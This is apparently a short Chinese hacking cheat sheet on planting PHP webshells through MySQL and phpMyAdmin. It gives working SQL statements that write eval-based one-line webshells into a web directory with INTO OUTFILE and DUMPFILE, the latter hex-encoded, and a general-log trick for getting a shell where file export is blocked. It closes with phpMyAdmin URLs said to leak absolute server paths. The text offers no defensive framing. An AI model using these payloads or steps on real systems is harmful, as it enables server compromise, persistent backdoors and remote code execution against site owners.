mysql 写入一句话

1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启         如果：  secure_file_priv NULL 值为 null 说明禁止状态，无法导出为文件，需要修改MySQL配置文件：查看是否有 secure_file_priv =  ，没有的话添加上             如果为一个目录，如：secure_file_priv = /home 那就只能导出到指定的目录，子目录也不行             如果为为空,如 secure_file_priv = ，说明可以导出到任意位置，注意等号一定要有 2、写入：     select '<?php eval($_POST[kill]);?>'  into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php';     导出的木马文件一定要在可执行的目录下，如果有phpinfo.php文件，可以确认一下；

方法二：

如果可以进入PHPmyadmin，但是无法导出文件，这时，可以进入变量， 搜索  general logOFF --这个默认是off，关闭的，把它打开     general log file --设置日志文件及位置          然后执行查询 select "<?php eval($_POST['hacker']);?>"     就可以连接日志文件了

补充：还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -

http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/database_interface.lib.php http://target/phpmyadmin/libraries/db_table_exists.lib.php  http://target/phpmyadmin/libraries/display_export.lib.php http://target/phpmyadmin/libraries/header_meta_style.inc.php    http://target/phpmyadmin/libraries/mcrypt.lib.php

http://www.oniont.cn/index.php/archives/85.html